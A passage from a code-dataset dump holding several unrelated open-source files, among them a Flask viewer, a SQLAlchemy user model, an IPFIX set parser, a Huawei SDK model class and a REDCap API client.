    \n \n\n'''\n_USER_THOUGHT_HTML = '''\n\n {ts}\n {thought}\n\n'''\n\napp = Flask(__name__)\n\n\ndef run_webserver(address, data_dir):\n data_path = pathlib.Path(data_dir)\n @app.route('/')\n def handle_index():\n users_html = []\n for user_dir in data_path.iterdir():\n users_html.append(_USER_LINE_HTML.format(user_id=user_dir.name))\n return _INDEX_HTML.format(users='\\n'.join(users_html))\n\n @app.route('/users/')\n def handle_user(user_id):\n thoughts = []\n print(user_id)\n data_user_dir_path = data_path / user_id\n for thought_file in data_user_dir_path.iterdir():\n user_thought = _USER_THOUGHT_HTML.format(\n ts=get_date_from_filename(file=thought_file),\n thought=thought_file.read_text())\n thoughts.append(user_thought)\n return _USER_PAGE_HTML.format(user_id=data_user_dir_path.name,\n thoughts='\\n'.join(thoughts))\n host, port = address\n app.run(host=host, port=port)\n\n\ndef get_date_from_filename(file):\n ts = datetime.strptime(file.stem, '%Y-%m-%d_%H-%M-%S')\n return ts.strftime('%Y-%m-%d %H:%M:%S')\n\n\ndef main(argv):\n if len(argv) != 3:\n print(f'USAGE: {argv[0]}
    ')\n return 1\n try:\n addr_arr = argv[1].split(':')\n run_webserver((addr_arr[0], int(addr_arr[1])), argv[2])\n except Exception as error:\n print(f'ERROR: {error}')\n return 1\n\n\nif __name__ == '__main__':\n import sys\n sys.exit(main(sys.argv))\n","repo_name":"michaldeutch/ASDServerClient","sub_path":"serverclient/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"74445790770","text":"# -*- coding: utf-8 -*-\n'''\nqwe = a\nrt = b\nasd = c\nfg = d\nzxc =e\nvb = f\nyu = g\niop = h\nhj = i\nkl = j\nn = k\nm = l\n'''\n\nimport json\nkeymap = {'q':'2', 'a':'2', 'z':'2',\\\n 'w':'3', 's':'3', 'x':'3',\\\n 'e':'4', 'd':'4', 'c':'5',\\\n 'r':'5', 'f':'5', 'v':'5',\\\n 't':'5', 'g':'5', 'b':'6',\\\n 'y':'6', 'h':'6', 'n':'6',\\\n 'u':'6', 'j':'6', 'm':'6',\\\n 'i':'7', 'k':'7',\\\n 'o':'8', 'l':'8',\\\n 'p':'9'}\n\ndef dumpToJson():\n keyseq = {}\n\n with open(\"dict.txt\") as f:\n for line in f:\n w, freq = line.strip().split()\n freq = int(freq)\n\n #key_sequence = ''.join([keymap[c] for c in w])\n key_seqs = ['']\n for c in w:\n if len(keymap[c]) > 1:\n tmp = []\n for km in keymap[c]:\n tmp += [ks+km for ks in key_seqs]\n key_seqs = tmp\n else:\n key_seqs = [ks+keymap[c] for ks in key_seqs]\n\n for key_sequence in key_seqs:\n if key_sequence not in keyseq:\n keyseq[key_sequence] = []\n keyseq[key_sequence].append((w, freq))\n\n for key in keyseq.keys():\n sorted(keyseq[key], key=lambda x: -x[1])\n\n with open(\"dict.json\", 'w') as f:\n json.dump(keyseq, f)\n\n\ndef avekeyToWords():\n with open(\"dict.json\") as f:\n keyseq = json.load(f)\n\n kwords = []\n for key, v in keyseq.items():\n kwords.append(len(v))\n kwords.sort(key = lambda x: -x)\n print (sum(kwords)/len(kwords))\n print (kwords[:50])\n\ndumpToJson()\navekeyToWords()\n\n'''\noriginal: 18, 15, 13 \nasd -> 12, 11, 11 \nyui -> 15, 13, 13 ()\nall -> 9, 9, 8 (avg: 1.08)\nqw, zx -> 15, 14, 14, 13\n'''\n","repo_name":"DrustZ/TenFingerTyping","sub_path":"webapp/src/Dict/dicttojson.py","file_name":"dicttojson.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"6118851925","text":"\"\"\"\n# Author: Yinghao Li\n# Modified: August 23rd, 2023\n# ---------------------------------------\n# Description: calculate the imbalance ratio of the datasets.\n\"\"\"\n\nimport sys\nimport logging\nimport os.path as op\nimport numpy as np\nfrom dataclasses import dataclass, field\nfrom muben.base.dataset import Dataset\nfrom muben.utils.io import set_logging\nfrom muben.utils.macro import CLASSIFICATION_DATASET\nfrom muben.utils.argparser import ArgumentParser\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass Arguments:\n \"\"\"\n Arguments regarding the training of Neural hidden Markov Model\n \"\"\"\n\n # --- IO arguments ---\n dataset_folder: str = field(metadata={\"help\": \"The folder containing all datasets\"})\n\n\ndef main(args: Arguments):\n for dataset_name in CLASSIFICATION_DATASET:\n dataset_dir = op.join(args.dataset_folder, dataset_name)\n\n training_dataset = Dataset().read_csv(data_dir=dataset_dir, partition=\"train\")\n valid_dataset = Dataset().read_csv(data_dir=dataset_dir, partition=\"valid\")\n test_dataset = Dataset().read_csv(data_dir=dataset_dir, partition=\"test\")\n\n lbs = np.concatenate(\n (training_dataset.lbs, valid_dataset.lbs, test_dataset.lbs), axis=0\n )\n\n ratios = 
list()\n for lbs_ in lbs.T:\n n_pos = np.sum(lbs_ == 1)\n n_neg = np.sum(lbs_ == 0)\n pos_ratio = n_pos / (n_pos + n_neg)\n ratios.append(pos_ratio if pos_ratio > 0.5 else (1 - pos_ratio))\n\n logger.info(\n f\"{dataset_name}: Mean: {np.mean(ratios):.4f}; Max: {np.max(ratios):.4f}\"\n )\n\n\nif __name__ == \"__main__\":\n # --- set up arguments ---\n parser = ArgumentParser(Arguments)\n if len(sys.argv) == 2 and sys.argv[1].endswith(\".json\"):\n # If we pass only one argument to the script, and it's the path to a json file,\n # let's parse it to get our arguments.\n (arguments,) = parser.parse_json_file(json_file=op.abspath(sys.argv[1]))\n else:\n (arguments,) = parser.parse_args_into_dataclasses()\n\n set_logging()\n main(arguments)\n","repo_name":"Yinghao-Li/MUBen","sub_path":"assist/dataset_imbalance_ratio.py","file_name":"dataset_imbalance_ratio.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"20"} +{"seq_id":"71388163889","text":"from app.extensions.db import db\nfrom datetime import datetime\nfrom .reviews import Reviews\nfrom .funny_reviews import FunnyReviews\nfrom .helpful_reviews import HelpfulReviews\nfrom .games import Games\nfrom .playtime import Playtime\n\n\nDATE_FORMAT = \"%Y-%m-%d\"\n\nclass Users(db.Model):\n\n __tablename__ = 'users'\n id = db.Column(db.String(50), primary_key=True, unique=True)\n steam_id = db.Column(db.String(50), unique=True)\n reviews = db.relationship('Reviews', backref='user', lazy='dynamic', cascade=\"all, delete\")\n funny_reviews = db.relationship('FunnyReviews', backref='user', lazy='dynamic', cascade=\"all, delete\")\n helpful_reviews = db.relationship('HelpfulReviews', backref='user', lazy='dynamic', cascade=\"all, delete\")\n playtime = db.relationship('Playtime', backref='user', lazy='dynamic', cascade=\"all, delete\")\n\n def __repr__(self):\n\n return f'<{self.__tablename__} {self.id}>'\n \n @classmethod\n def add(cls, id:str, steam_id:str):\n \"\"\"Documentation here\n \"\"\"\n if (not cls.id_exists(id) and not cls.steam_id_exists(steam_id)):\n\n attr = cls(\n id=id,\n steam_id=steam_id\n )\n db.session.add(attr)\n db.session.commit()\n\n return attr\n \n @classmethod\n def get(cls, first=True, **fields):\n \n obj = cls.query.filter_by(**fields)\n\n if obj:\n\n if first:\n\n obj = obj.first()\n\n return obj\n \n else:\n\n raise ValueError(f\"record {fields} not exists into {cls.__tablename__}, please add it\")\n \n def add_review(self, review:str, recommend:bool, posted:str=datetime.now().date().strftime(DATE_FORMAT)):\n \"\"\"\n Documentation here\n \"\"\"\n\n return Reviews.add(\n review=review,\n recommend=recommend,\n posted=posted\n )\n \n @classmethod\n def id_exists(cls, id:int):\n r\"\"\"\n Documentation here\n \"\"\"\n attr = cls.get(id=id)\n\n if attr:\n \n return True\n \n return False\n \n @classmethod\n def steam_id_exists(cls, id:int):\n r\"\"\"\n Documentation here\n \"\"\"\n attr = cls.get(steam_id=id)\n\n if attr:\n \n return True\n \n return False\n \n def vote_for_funny_review(self, review:Reviews, funny:bool):\n \"\"\"Documentation here\n \"\"\"\n if review.user_id != self.id:\n\n if review not in self.funny_reviews:\n\n FunnyReviews.add(user_id=self.id, funny=funny, review_id=review.id)\n\n else:\n\n return None\n \n def vote_for_helpful_review(self, review:Reviews, helpful:bool):\n \"\"\"Documentation here\n \"\"\"\n if review.user_id != self.id:\n\n if review not in self.helpful_reviews:\n\n 
HelpfulReviews.add(user_id=self.id, helpful=helpful, review_id=review.id)\n\n else:\n\n return None\n \n def buy_game(self, game:Games):\n \"\"\"Documentation here\n \"\"\"\n if game not in self.games:\n\n self.games.append(game)\n \n def set_playtime(self, game:Games, playtime_forever:float, playtime_2weeks:float):\n \"\"\"Documentation here\n \"\"\"\n play_time = Playtime.add(\n game_id=game.id,\n user_id=self.id,\n playtime_forever=playtime_forever,\n playtime_2weeks=playtime_2weeks\n )\n db.session.add(play_time)\n db.session.commit()\n\n def serialize(self):\n \"\"\"Documentation here\n \"\"\"\n games = list()\n \n for game in self.games:\n \n playtime = Playtime.filter_by_user_and_game(user_id=self.id, game_id=game.id)\n if playtime is None:\n playtime = {\"playtime_forever\": 0, \"playtime_2weeks\": 0}\n else:\n playtime = playtime.serialize()\n \n result = game.serialize()\n result.update(playtime)\n games.append(result)\n \n return {\n \"id\": self.id,\n \"steam_id\": self.steam_id,\n \"games\": games,\n \"reviews\": [review.serialize() for review in self.reviews]\n }\n\n","repo_name":"know-ai/steam-rs","sub_path":"app/dbmodels/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"23390895479","text":"# Reference: https://tools.ietf.org/html/rfc7011\n# Set Format:\n# +--------------------------------------------------+\n# | Set Header |\n# +--------------------------------------------------+\n# | record |\n# +--------------------------------------------------+\n# | record |\n# +--------------------------------------------------+\n# ...\n# +--------------------------------------------------+\n# | record |\n# +--------------------------------------------------+\n# | Padding (opt.) 
|\n# +--------------------------------------------------+\n#\n# Set Header Format:\n# 0 1 2 3\n# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1\n# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n# | Set ID | Length |\n# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n\nimport struct, logging, json\nfrom Lib.ParameterChecking import checkType, checkInteger\nfrom TemplateRecord import TemplateRecord\nfrom OptionTemplateRecord import OptionTemplateRecord\nfrom DataRecord import DataRecord\nfrom ObservationDomain import ObservationDomain\n\nclass Set(object):\n _str = struct.Struct('!HH')\n \n def __init__(self):\n self.setId = None\n self.setType = None\n self.length = None\n self.padLength = None\n self.records = []\n \n def __del__(self):\n for r in self.records: del r\n del self.setId\n del self.setType\n del self.length\n del self.padLength\n del self.records\n\n @classmethod\n def createTemplateSet(cls):\n obj = cls()\n obj.setId = 2\n obj.setType = 'template'\n return(obj)\n\n @classmethod\n def createOptionTemplateSet(cls):\n obj = cls()\n obj.setId = 3\n obj.setType = 'optionTemplate'\n return(obj)\n \n @classmethod\n def createDataSet(cls, domain, setId):\n checkType('domain', (ObservationDomain,), domain)\n checkInteger('setId', setId)\n if((setId == 0) or (setId == 1)): raise Exception('Unusable SetId(%d)' % setId)\n if(setId == 2): raise Exception('SetId(%d) can only be used in TemplateSets' % setId)\n if(setId == 3): raise Exception('SetId(%d) can only be used in OptionTemplateSets' % setId)\n if((setId >= 4) and (setId <= 255)): raise Exception('Reserved SetId(%d)' % setId)\n if(not domain.hasExporterTemplate(setId)):\n raise Exception('Domain(%d) does not contain Exporter Template(%d)' % (domain.obsDomainId, setId))\n obj = cls()\n obj.setId = setId\n obj.setType = 'data'\n return(obj)\n \n @classmethod\n def _readHeader(cls, rawData, obj):\n data = rawData.read(Set._str.size)\n (setId, length) = Set._str.unpack_from(data)\n \n if((setId == 0) or (setId == 1)):\n raise Exception('Unusable Set Type (%d)' % setId)\n elif((setId >= 4) and (setId <= 255)):\n raise Exception('Reserved Set Type (%d)' % setId)\n elif(setId == 2):\n obj.setId = setId\n obj.setType = 'template'\n obj.length = length\n elif(setId == 3):\n obj.setId = setId\n obj.setType = 'optionTemplate'\n obj.length = length\n else:\n obj.setId = setId\n obj.setType = 'data'\n obj.length = length\n\n @classmethod\n def read(cls, domain, rawData):\n logger = logging.getLogger(__name__)\n\n obj = cls()\n baseOffset = rawData.tell()\n cls._readHeader(rawData, obj)\n if(obj.setType == 'template'):\n while(obj.length - (rawData.tell() - baseOffset) > 4):\n record = TemplateRecord.read(rawData)\n obj.records.append(record)\n elif(obj.setType == 'optionTemplate'):\n while(obj.length - (rawData.tell() - baseOffset) > 4):\n OptionTemplateRecord.read(rawData)\n obj.records.append(record)\n else:\n if(not domain.hasCollectorTemplate(obj.setId)):\n logger.warning('Ignoring DataRecord since ObservationDomain(%d) does not contain Collector Template(%d)' % (domain.obsDomainId, obj.setId))\n cls._readPadding(rawData, obj, baseOffset)\n else:\n template = domain.getCollectorTemplate(obj.setId)\n while(obj.length - (rawData.tell() - baseOffset) > 4):\n record = DataRecord.read(template, rawData, domain)\n obj.records.append(record)\n cls._readPadding(rawData, obj, baseOffset)\n return(obj)\n \n @classmethod\n def _readPadding(cls, rawData, obj, baseOffset):\n paddingSize = 
obj.length - (rawData.tell() - baseOffset)\n rawData.read(paddingSize)\n \n def _computeLength(self):\n self.length = Set._str.size\n for record in self.records:\n self.length += record._computeLength()\n remLength = self.length % 4\n self.padLength = 0 if(remLength == 0) else (4 - remLength)\n self.length += self.padLength\n return(self.length)\n\n def _writeHeader(self, rawData):\n rawData.write(Set._str.pack(self.setId, self.length))\n\n def _writePadding(self, rawData):\n if(self.padLength > 0):\n rawData.write(struct.pack('x'*self.padLength))\n \n def write(self, rawData):\n self._writeHeader(rawData)\n for record in self.records:\n record.write(rawData)\n self._writePadding(rawData)\n \n def addRecord(self, record):\n if(self.setType == 'template'):\n checkType('record', (TemplateRecord,), record)\n elif(self.setType == 'optionTemplate'):\n checkType('record', (OptionTemplateRecord,), record)\n elif(self.setType == 'data'):\n checkType('record', (DataRecord,), record)\n else:\n raise Exception('Invalid Set Type(%s)' % str(self.setType))\n self.records.append(record)\n\n def getNumRecords(self): return(len(self.records))\n def getRecords(self): return(self.records)\n\n def getRecord(self, index):\n checkInteger('index', index)\n maxIndex = len(self.records)-1\n if(index < 0 or index > maxIndex):\n raise Exception('Out of range index(%d) must be between 0 and length-1(%d)' % (\n index, maxIndex))\n return(self.records[index])\n\n def toJSON(self):\n return({\n 'setId': self.setId,\n #'setType': self.setType,\n #'length': self.length,\n #'padLength': self.padLength,\n 'records': map(lambda s: s.toJSON(), self.records)\n })\n \n def __str__(self):\n return(json.dumps(self.toJSON()))\n","repo_name":"lgifre/pyIPFIX","sub_path":"Set.py","file_name":"Set.py","file_ext":"py","file_size_in_byte":6972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"41169508972","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app_TFT', '0007_auto_20150721_0803'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='teacher',\n name='role',\n field=models.CharField(default=b'l', max_length=1, choices=[(b'l', b'Lecturer'), (b'c', b'Coach')]),\n ),\n ]\n","repo_name":"jacgrady1/gitTFT","sub_path":"project_TFT/app_TFT/migrations/0008_auto_20150730_0448.py","file_name":"0008_auto_20150730_0448.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"21858587909","text":"# coding: utf-8\n\nimport six\n\nfrom huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization\n\n\nclass KeyWordsStat:\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n sensitive_list = []\n\n openapi_types = {\n 'keyword': 'str',\n 'freq': 'int'\n }\n\n attribute_map = {\n 'keyword': 'keyword',\n 'freq': 'freq'\n }\n\n def __init__(self, keyword=None, freq=None):\n \"\"\"KeyWordsStat\n\n The model defined in huaweicloud sdk\n\n :param keyword: 关键词。\n :type keyword: str\n :param freq: 关键词频次。\n :type freq: int\n \"\"\"\n \n \n\n self._keyword = None\n self._freq = None\n self.discriminator = None\n\n self.keyword = keyword\n self.freq = freq\n\n @property\n def 
keyword(self):\n \"\"\"Gets the keyword of this KeyWordsStat.\n\n 关键词。\n\n :return: The keyword of this KeyWordsStat.\n :rtype: str\n \"\"\"\n return self._keyword\n\n @keyword.setter\n def keyword(self, keyword):\n \"\"\"Sets the keyword of this KeyWordsStat.\n\n 关键词。\n\n :param keyword: The keyword of this KeyWordsStat.\n :type keyword: str\n \"\"\"\n self._keyword = keyword\n\n @property\n def freq(self):\n \"\"\"Gets the freq of this KeyWordsStat.\n\n 关键词频次。\n\n :return: The freq of this KeyWordsStat.\n :rtype: int\n \"\"\"\n return self._freq\n\n @freq.setter\n def freq(self, freq):\n \"\"\"Sets the freq of this KeyWordsStat.\n\n 关键词频次。\n\n :param freq: The freq of this KeyWordsStat.\n :type freq: int\n \"\"\"\n self._freq = freq\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n if attr in self.sensitive_list:\n result[attr] = \"****\"\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n import simplejson as json\n if six.PY2:\n import sys\n reload(sys)\n sys.setdefaultencoding(\"utf-8\")\n return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)\n\n def __repr__(self):\n \"\"\"For `print`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, KeyWordsStat):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","repo_name":"huaweicloud/huaweicloud-sdk-python-v3","sub_path":"huaweicloud-sdk-cbs/huaweicloudsdkcbs/v1/model/key_words_stat.py","file_name":"key_words_stat.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"20"} +{"seq_id":"16326549194","text":"import json\nimport re\nfrom collections import defaultdict\nfrom urllib.parse import unquote\n\nfrom d3b_utils.requests_retry import Session\n\n\ndef _undefault_dict(d):\n if isinstance(d, dict):\n d = {k: _undefault_dict(v) for k, v in d.items()}\n if isinstance(d, set):\n return sorted(d)\n return d\n\n\nclass REDCapError(Exception):\n pass\n\n\n# Note to future developers: This class uses get_ and set_ methods on purpose\n# to control the user experience. Please don't replace them with property\n# decorators. It needs to be completely unambiguous without inspecting the\n# implementation that the data is somewhere else and that setting anything\n# has serious consequences. 
This is an interface for manipulating REDCap with\n# project administrative privilege, not just some data container.\n# - Avi\nclass REDCapStudy:\n def __init__(self, api_url, api_token):\n self.api = api_url\n self.api_token = api_token\n\n def _get_response(self, content, params=None, **kwargs):\n \"\"\"API request implementation\n\n :param content: What kind of content we're requesting to get or set\n :param params: additional parameters to send\n :raises REDCapError: REDCap returned an error status\n :return: REDCap server requests.Response object\n \"\"\"\n all_params = {\n \"token\": self.api_token,\n \"content\": content,\n \"format\": \"json\",\n \"returnFormat\": \"json\",\n }\n all_params.update(params or {})\n if \"data\" in all_params and not isinstance(all_params[\"data\"], str):\n all_params[\"data\"] = json.dumps(all_params[\"data\"])\n all_params = {k: v for k, v in all_params.items() if v is not None}\n resp = Session(status_forcelist=(502, 503, 504)).post(\n self.api, data=all_params, **kwargs\n )\n if resp.status_code != 200:\n raise REDCapError(f\"HTTP {resp.status_code} - {resp.text}\")\n return resp\n\n def _get_json(self, *args, **kwargs):\n return self._get_response(*args, **kwargs).json()\n\n def _get_text(self, *args, **kwargs):\n return self._get_response(*args, **kwargs).text\n\n def get_arm_names(self):\n \"\"\"Export Arm names\n\n :return: list of dicts with Arm numbers and names\n \"\"\"\n # https://redcap.chop.edu/api/help/?content=exp_arms\n return self._get_json(\"arm\")\n\n def set_arm_names(self, arms, delete_all_first=True):\n \"\"\"Import Arm names or rename existing Arms\n\n :param delete_all_first: erase all existing Arms first before importing\n :return: number of Arms imported\n \"\"\"\n # https://redcap.chop.edu/api/help/?content=imp_arms\n return self._get_json(\n \"arm\",\n params={\n \"data\": arms,\n \"override\": \"1\" if delete_all_first else \"0\",\n \"action\": \"import\",\n },\n )\n\n def get_event_metadata(self):\n \"\"\"Export Event details (names, numbers, labels, offsets)\n\n :return: list of dicts with Event details\n \"\"\"\n # https://redcap.chop.edu/api/help/?content=exp_metadata\n return self._get_json(\"event\")\n\n def set_event_metadata(self, events, delete_all_first=True):\n \"\"\"Import Event details (names, numbers, labels, offsets)\n\n :param events: see get_event_metadata return\n :param delete_all_first: erase all existing Events first before importing\n :return: number of Events imported\n \"\"\"\n # https://redcap.chop.edu/api/help/?content=imp_metadata\n return self._get_json(\n \"event\",\n params={\n \"action\": \"import\",\n \"override\": \"1\" if delete_all_first else \"0\",\n },\n )\n\n def get_instrument_labels(self):\n \"\"\"Export mappings of instrument internal names to their display labels\n\n :return: list of dicts with instrument_name and instrument_label keys\n \"\"\"\n return self._get_json(\"instrument\")\n\n def get_field_export_names(self):\n \"\"\"Export mappings of field names and selected values to exported names\n\n :return: list of dicts of field choices\n \"\"\"\n # https://redcap.chop.edu/api/help/?content=exp_field_names\n return self._get_json(\"exportFieldNames\")\n\n def _act_file(\n self,\n action,\n record,\n field,\n event=None,\n repeat_instance=None,\n file_data=None,\n ):\n params = {\n \"action\": action,\n \"record\": record,\n \"field\": field,\n \"event\": event,\n \"repeat_instance\": repeat_instance,\n }\n return self._get_response(\"file\", params, files=file_data)\n\n def 
get_file(self, record, field, event=None, repeat_instance=None):\n \"\"\"Export a File from a file upload field on a record\n\n :param record: the record ID the file is attached to\n :param field: the name of field with the file\n :param event: event name if longitudinal\n :param repeat_instance: which instance if instrument/event is repeating\n :return: dict with \"filename\" str and \"body\" bytes\n \"\"\"\n # https://redcap.chop.edu/api/help/?content=exp_file\n resp = self._act_file(\"export\", record, field, event, repeat_instance)\n file_name = (\n unquote(\n resp.headers[\"Content-Type\"].split('name=\"')[1].split('\";')[0]\n )\n .encode(\"latin1\")\n .decode(\"utf-8\")\n )\n return {\"body\": resp.content, \"filename\": file_name}\n\n def set_file(\n self,\n filename,\n file_obj,\n record,\n field,\n event=None,\n repeat_instance=None,\n ):\n \"\"\"Attach a File to a file upload field on a record\n\n :param filename: name of the file to create\n :param file_obj: contents of or read object for the file\n :param record: the record ID the file is attached to\n :param field: the name of field with the file\n :param event: event name if longitudinal\n :param repeat_instance: which instance if instrument/event is repeating\n \"\"\"\n # https://redcap.chop.edu/api/help/?content=imp_file\n self._act_file(\n \"import\",\n record,\n field,\n event,\n repeat_instance,\n {\"file\": (filename, file_obj)},\n )\n\n def delete_file(self, record, field, event=None, repeat_instance=None):\n \"\"\"Delete a File from a file upload field on a record\n\n :param record: the record ID the file is attached to\n :param field: the name of field with the file\n :param event: event name if longitudinal\n :param repeat_instance: which instance if instrument/event is repeating\n \"\"\"\n # https://redcap.chop.edu/api/help/?content=del_file\n self._act_file(\n action=\"delete\",\n record=record,\n field=field,\n event=event,\n repeat_instance=repeat_instance,\n )\n\n def get_redcap_version(self):\n \"\"\"Get the version of REDCap as a string\"\"\"\n # https://redcap.chop.edu/api/help/?content=exp_rc_v\n return self._get_text(\"version\")\n\n def get_project_info(self):\n \"\"\"Get basic project attributes such as title, logitudinality,\n if surveys are enabled, creation time, etc.\"\"\"\n return self._get_json(\"project\")\n\n def set_project_info(self, project_info):\n \"\"\"Set basic project attributes such as title, logitudinality,\n if surveys are enabled, creation time, etc.\"\"\"\n # https://redcap.chop.edu/api/help/?content=imp_proj_sett\n return self._get_json(\"project_settings\", params={\"data\": project_info})\n\n def get_project_xml(\n self,\n metadata_only=True,\n include_data_access_groups=True,\n include_survey_fields=True,\n include_files=True,\n ):\n \"\"\"Fetch the entire project as a special XML file in CDISC ODM format.\n\n :param metadata_only: Don't include any of the record data\n :param include_data_access_groups: Include the redcap_data_access_group\n field in data (does nothing if metadata_only is True)\n :param include_survey_fields: Include survey identifier fields in data\n (does nothing if metadata_only is True)\n :param include_files: Include file_upload and signature fields in data\n (does nothing if metadata_only is True)\n\n :return: string contents of an XML file\n \"\"\"\n return self._get_text(\n \"project_xml\",\n {\n \"returnMetadataOnly\": metadata_only,\n \"exportDataAccessGroups\": include_data_access_groups,\n \"exportSurveyFields\": include_survey_fields,\n 
\"exportFiles\": include_files,\n },\n )\n\n def get_users(self):\n \"\"\"List user information with privileges, email address, and names\"\"\"\n return self._get_json(\"user\")\n\n def set_users(self, users):\n \"\"\"Set or update user privileges, email address, and names\n\n :param users: see output of get_users\n :return: number of users added or updated\n \"\"\"\n return self._get_json(\"user\", {\"data\": users})\n\n def get_data_dictionary(self):\n \"\"\"Get the instrument definition information.\"\"\"\n return self._get_json(\"metadata\")\n\n def set_data_dictionary(self, data_dictionary):\n \"\"\"Set the instrument definitions.\n\n :param data_dictionary: see output of get_data_dictionary\n :return: number of fields imported\n \"\"\"\n return self._get_json(\"metadata\", {\"data\": data_dictionary})\n\n def get_instrument_event_mappings(self):\n return self._get_json(\"formEventMapping\")\n\n def set_instrument_event_mappings(self, iem):\n return self._get_json(\"formEventMapping\", {\"data\": iem})\n\n def create_project(self, project_data):\n raise NotImplementedError() # TODO\n\n def get_instrument_tree(self):\n \"\"\"\n Get a tree of instrument metadata that looks like:\n {\n : {\n \"events\": {, , ...},\n \"fields\": {\n : <{field_info_dict}>,\n ...\n },\n ...\n }\n \"\"\"\n store = defaultdict( # forms\n lambda: defaultdict(dict) # events and fields\n )\n for m in self.get_data_dictionary():\n instrument = m.pop(\"form_name\")\n field_name = m.pop(\"field_name\")\n store[instrument][\"fields\"][field_name] = m\n store[instrument][\"events\"] = set()\n\n for form in self.get_instrument_event_mappings():\n store[form[\"form\"]][\"events\"].add(form[\"unique_event_name\"])\n\n return _undefault_dict(store)\n\n def _records_getter(\n self,\n content,\n raw=True,\n raw_headers=True,\n checkbox_labels=False,\n params=None,\n ):\n args = {\n \"rawOrLabel\": \"raw\" if raw else \"label\",\n \"rawOrLabelHeaders\": \"raw\" if raw_headers else \"label\",\n \"exportCheckboxLabel\": \"true\" if checkbox_labels else \"false\",\n }\n args.update(params or {})\n return self._get_json(content, params=args)\n\n def get_subjects(self):\n \"\"\"Get the list of record subject IDs\"\"\"\n id_field = self.get_data_dictionary()[0][\"field_name\"]\n id_records = self._records_getter(\"record\", params={\"fields\": id_field})\n return list({e[id_field] for e in id_records})\n\n def get_records(\n self,\n type=\"eav\",\n raw=True,\n raw_headers=True,\n checkbox_labels=False,\n survey_fields=True,\n data_access_groups=True,\n fields=None,\n ):\n \"\"\"Returns all data from the study without restructuring\"\"\"\n remaining_subjects = self.get_subjects()\n batch_size = len(remaining_subjects)\n print(f\"Found {batch_size} subjects.\")\n records = []\n while remaining_subjects:\n batch = remaining_subjects[:batch_size]\n print(f\"Requesting {len(batch)} subjects...\")\n params = {\n \"type\": type,\n \"exportSurveyFields\": \"true\" if survey_fields else \"false\",\n \"exportDataAccessGroups\": \"true\"\n if data_access_groups\n else \"false\",\n }\n for i, r in enumerate(batch):\n params[f\"records[{i}]\"] = r\n\n if fields:\n for i, f in enumerate(fields):\n params[f\"fields[{i}]\"] = f\n\n try:\n records.extend(\n self._records_getter(\n \"record\",\n raw=raw,\n raw_headers=raw_headers,\n checkbox_labels=checkbox_labels,\n params=params,\n )\n )\n remaining_subjects = remaining_subjects[batch_size:]\n except REDCapError as e:\n if str(e).startswith((\"HTTP 400\", \"HTTP 500\")):\n print(\"Reducing batch 
size and trying again...\")\n batch_size = int(0.5 + (batch_size / 2))\n else:\n print(str(e))\n return\n\n if type == \"eav\":\n id_field = self.get_data_dictionary()[0][\"field_name\"]\n records = [r for r in records if r[\"field_name\"] != id_field]\n return records\n\n def set_records(\n self, records, type=\"eav\", overwrite=False, auto_number=False\n ):\n args = {\n \"type\": type,\n \"data\": records,\n \"overwriteBehavior\": \"overwrite\" if overwrite else \"normal\",\n \"forceAutoNumber\": \"true\" if auto_number else \"false\",\n }\n if auto_number:\n args[\"returnContent\"] = \"auto_ids\"\n return self._get_json(\"record\", params=args)\n\n def delete_records(self, record_name_list, arm=None):\n args = {\"action\": \"delete\"}\n for i, r in enumerate(record_name_list):\n args[f\"records[{i}]\"] = r\n if arm is not None:\n args[\"arm\"] = arm\n return self._get_json(\"record\", args)\n\n def get_repeating_forms_events(self):\n self._get_json(\"repeatingFormsEvents\")\n\n def set_repeating_forms_events(self, rfe):\n self._get_json(\"repeatingFormsEvents\", params={\"data\": rfe})\n\n def get_report_records(\n self, report_id, raw=True, raw_headers=True, checkbox_labels=False\n ):\n return self._records_getter(\n \"report\",\n raw=raw,\n raw_headers=raw_headers,\n 